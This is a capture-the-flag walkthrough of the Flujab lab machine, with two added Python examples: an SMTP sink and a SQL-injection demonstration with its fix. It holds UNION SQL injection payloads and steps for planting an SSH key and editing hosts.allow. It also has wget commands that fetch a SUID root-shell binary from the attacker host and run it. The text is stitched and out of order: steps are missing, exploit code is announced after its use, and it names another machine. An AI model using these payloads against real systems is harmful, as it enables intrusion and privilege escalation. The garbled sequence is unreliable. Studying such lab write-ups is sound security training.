As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on them.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scan the entire port range, from 1 to 65535.
-T5 insane mode, the fastest of nmap's timing templates.
-Pn assume the host is online and skip host discovery.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allPorts file.
# Nmap 7.93 scan initiated Tue May 16 07:23:48 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.124
Nmap scan report for 10.10.10.124
Host is up (0.038s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
8080/tcp open http-proxy
# Nmap done at Tue May 16 07:24:02 2023 -- 1 IP address (1 host up) scanned in 14.71 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
Now, by changing the cookies, we'll be able to access the cancellation page.
If we take a look back at the curl request, we'll see that the Modus cookie has the path variable set to /?smtp_config. This shows a page where we can configure the SMTP server.
There is a link to a whitelist, but right now it is empty.
Let's set up an SMTP server with python.
python -m smtpd -c DebuggingServer 10.10.14.8:25
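The smtpd module used above was removed from the standard library in Python 3.12, so here is an added stand-in (not code from the writeup) that does the same job: it accepts any message over plain SMTP, keeps it in memory and dumps it in the DebuggingServer layout. The listening port 2525 and the 220/250 banner texts are my own choices.

```python
import asyncio

class SmtpSink:
    def __init__(self):
        self.messages = []            # (sender, recipients, body) per accepted message
        self._reset()
    def _reset(self):
        self.sender, self.rcpts, self.lines, self.in_data = None, [], [], False
    def handle_line(self, line):
        """Feed one line (CRLF stripped); return the reply to send, or None while in DATA."""
        if self.in_data:
            if line == ".":           # lone dot terminates the message body
                self.messages.append((self.sender, list(self.rcpts), "\n".join(self.lines)))
                self._reset()
                return "250 OK: queued"
            self.lines.append(line[1:] if line.startswith("..") else line)  # dot-unstuffing
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            return "250 sink"
        if verb == "MAIL":            # MAIL FROM:<addr>
            self.sender = arg.split(":", 1)[-1].strip()
            return "250 OK"
        if verb == "RCPT":            # RCPT TO:<addr>
            self.rcpts.append(arg.split(":", 1)[-1].strip())
            return "250 OK"
        if verb == "DATA":
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            return "221 Bye"
        return "500 Unrecognised command"

async def _session(sink, reader, writer):
    writer.write(b"220 sink ready\r\n")
    while raw := await reader.readline():
        reply = sink.handle_line(raw.decode("latin-1").rstrip("\r\n"))
        if reply:
            writer.write(reply.encode() + b"\r\n")
        if reply == "250 OK: queued":  # dump the mail the way smtpd's DebuggingServer did
            print("---------- MESSAGE FOLLOWS ----------\n%s\n------------ END MESSAGE ------------" % sink.messages[-1][2])
        if reply == "221 Bye":
            break
    await writer.drain()
    writer.close()

async def serve(host="0.0.0.0", port=2525):   # binding port 25 instead would need root
    sink = SmtpSink()
    srv = await asyncio.start_server(lambda r, w: _session(sink, r, w), host, port)
    await srv.serve_forever()
```

Run it with `python3 -c 'import asyncio, smtp_sink; asyncio.run(smtp_sink.serve())'` (assuming the file is saved as smtp_sink.py) and point the application's SMTP host and port at it.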
We won't be able to add our IP address as the SMTP server because the input field has a pattern configured.
But, as this restriction is enforced only on the client side, we can simply delete it.
Now our IP address appears in the whitelist.
Try to cancel an appointment, intercept the request with Burp Suite, and send it to Repeater. If we send the request, we'll see an email arrive at our SMTP server.
---------- MESSAGE FOLLOWS ----------
b'Date: Wed, 17 May 2023 09:51:52 +0100'
b'To: cancelations@no-reply.flujab.htb'
b'From: Nurse Julie Walters <DutyNurse@flujab.htb>'
b'Subject: Flu Jab Appointment - Ref:NHS-943-475-5911'
b'Message-ID: <6ddc8890255fba84d597a104d800b9dd@freeflujab.htb>'
b'X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)'
b'MIME-Version: 1.0'
b'Content-Type: text/plain; charset=iso-8859-1'
b'X-Peer: 10.10.10.124'
b''
b' CANCELLATION NOTICE!'
b' ________________________'
b' '
b' VACCINATION'
b' Routine Priority'
b' ------------------'
b' REF : NHS-943-475-5911 '
b' Code : Influ-022'
b' Type : Injection'
b' Stat : CANCELED '
b' LOC : Crick026 '
b' ________________________'
b''
b' Your flu jab appointment has been canceled.'
b' Have a nice day,'
b''
b' Nurse Julie Walters'
b' Senior Staff Nurse'
b' Cricklestone Doctors Surgery'
b' NHS England.'
b' '
------------ END MESSAGE ------------
Let's check whether the nhsnum parameter is vulnerable to SQL injection. It is: a UNION with five columns succeeds, so the current table has five columns, and the third column is reflected in the email subject.
---------- MESSAGE FOLLOWS ----------
b'Date: Wed, 17 May 2023 10:10:30 +0100'
b'To: cancelations@no-reply.flujab.htb'
b'From: Nurse Julie Walters <DutyNurse@flujab.htb>'
b'Subject: Flu Jab Appointment - Ref:3'
b'Message-ID: <9d3d84021610bc21418cc2c17747d394@freeflujab.htb>'
b'X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)'
b'MIME-Version: 1.0'
b'Content-Type: text/plain; charset=iso-8859-1'
b'X-Peer: 10.10.10.124'
b''
b' CANCELLATION NOTICE!'
b' ________________________'
b' '
b' VACCINATION'
b' Routine Priority'
b' ------------------'
b" REF : ' union select 1,2,3,4,5-- - "
b' Code : Influ-022'
b' Type : Injection'
b' Stat : CANCELED '
b' LOC : Crick026 '
b' ________________________'
b''
b' Your flu jab appointment has been canceled.'
b' Have a nice day,'
b''
b' Nurse Julie Walters'
b' Senior Staff Nurse'
b' Cricklestone Doctors Surgery'
b' NHS England.'
b' '
------------ END MESSAGE ------------
Let's get the name of the database.
nhsnum=' union select 1,2,database(),4,5-- -&submit=Cancel+Appointment
The most interesting one is the admin table, with the following column names.
nhsnum=' UNION SELECT 1,2,group_concat(column_name),4,5 FROM information_schema.columns WHERE table_schema="vaccinations" AND table_name="admin"-- -&submit=Cancel+Appointment
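The injection works because the form value is concatenated straight into the query. This added example (not code from the box or the writeup) reproduces the bug against a constructed sqlite3 table and shows the fix with parameter binding; the backend on the box is MySQL, and the 10-digit NHS-number format check is an assumption of mine.

```python
import sqlite3

# Constructed stand-in for the appointments lookup behind the cancellation form.
INJECTION = "' union select 1,2,3,4,5-- -"   # the UNION probe sent in the writeup

def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE appointments (nhsnum TEXT, code TEXT, ref TEXT, type TEXT, loc TEXT)")
    db.execute("INSERT INTO appointments VALUES "
               "('9434755911', 'Influ-022', 'NHS-943-475-5911', 'Injection', 'Crick026')")
    return db

def lookup_vulnerable(db, nhsnum):
    # String interpolation: the form value is parsed as SQL, so a quote closes the
    # literal and the rest of the input (UNION ... -- -) becomes part of the statement.
    sql = "SELECT nhsnum, code, ref, type, loc FROM appointments WHERE nhsnum = '%s'" % nhsnum
    return db.execute(sql).fetchone()

def lookup_safe(db, nhsnum):
    # Parameter binding: the value travels as data and cannot change the query shape.
    sql = "SELECT nhsnum, code, ref, type, loc FROM appointments WHERE nhsnum = ?"
    return db.execute(sql, (nhsnum,)).fetchone()

def is_valid_nhsnum(value):
    # Defence in depth (assumed format): reject anything that is not exactly 10 digits
    # before the value reaches the database layer at all.
    return value.isdigit() and len(value) == 10

def subject_for(row):
    # The third selected column ends up in the mail subject, which is why the
    # probe shows up as "Ref:3" in the captured e-mail.
    return "Flu Jab Appointment - Ref:%s" % row[2] if row else None
```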
The password hash can be cracked with CrackStation.
The freeflujab.htb domain name shows the following login page on port 8080.
Once logged in, we'll see that the Notepad tool allows us to load files from the server.
We can't log in via SSH as sysadm with the credentials that we have.
ssh sysadm@10.10.10.124
kex_exchange_identification: read: Connection reset by peer
Connection reset by 10.10.10.124 port 22
This is likely caused by the SSH configuration. Load the /etc/hosts.allow file in the Notepad tool, add our IP address and the localhost address, then save the file.
Open a file, delete all the content, paste our public SSH key, and save it as access in /home/sysadm.
The file needs the right permissions to work. We can set them through the Ajenti API, using the /chmod endpoint.
Finally, we are able to log in via SSH.
ssh sysadm@10.10.10.124
Linux flujab 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
sysadm@flujab:~$ whoami
sysadm
As we can see, we are currently in a restricted bash (rbash).
ifconfig
-rbash: ifconfig: command not found
We can bypass this restriction easily: rbash is only the login shell, so asking sshd to run bash as the remote command gives us an unrestricted shell instead.
ssh sysadm@10.10.10.124 bash
whoami
sysadm
Privilege Escalation
First, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command on my local machine:
stty size
51 236
And set the proper dimensions in the victim machine:
libhax.c: In function ‘dropshell’:
libhax.c:7:5: warning: implicit declaration of function ‘chmod’ [-Wimplicit-function-declaration]
    7 |     chmod("/tmp/rootshell", 04755);
      |     ^~~~~
Now, let's create the rootshell.c file, which will give us the shell as root.
rootshell.c: In function ‘main’:
rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
    3 |     setuid(0);
      |     ^~~~~~
rootshell.c:4:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
    4 |     setgid(0);
      |     ^~~~~~
rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’ [-Wimplicit-function-declaration]
    5 |     seteuid(0);
      |     ^~~~~~~
rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration]
    6 |     setegid(0);
      |     ^~~~~~~
rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration]
    7 |     execvp("/bin/sh", NULL, NULL);
      |     ^~~~~~
rootshell.c:7:5: warning: too many arguments to built-in function ‘execvp’ expecting 2 [-Wbuiltin-declaration-mismatch]
Then, we'll have to transfer the libhax.so and rootshell files to the haircut machine. Let's set up a simple HTTP server with python in the current directory.
python -m http.server 80
Then, on the victim machine, let's go to the /tmp directory, and download both files from our HTTP server.
cd /tmp
wget http://10.10.14.8/libhax.so
wget http://10.10.14.8/rootshell
chmod +x *
Then go to the /etc directory on the victim machine and execute the following commands.
Finally, if we execute the rootshell file in the /tmp folder, we'll get a shell as root, and all we have to do is reap the harvest and take the root flag.
I found an exploit on exploitdb, which indicates how to get a shell as root with the screen binary with the SUID permission. First, let's create the libhax.c file on our machine, and add the following code.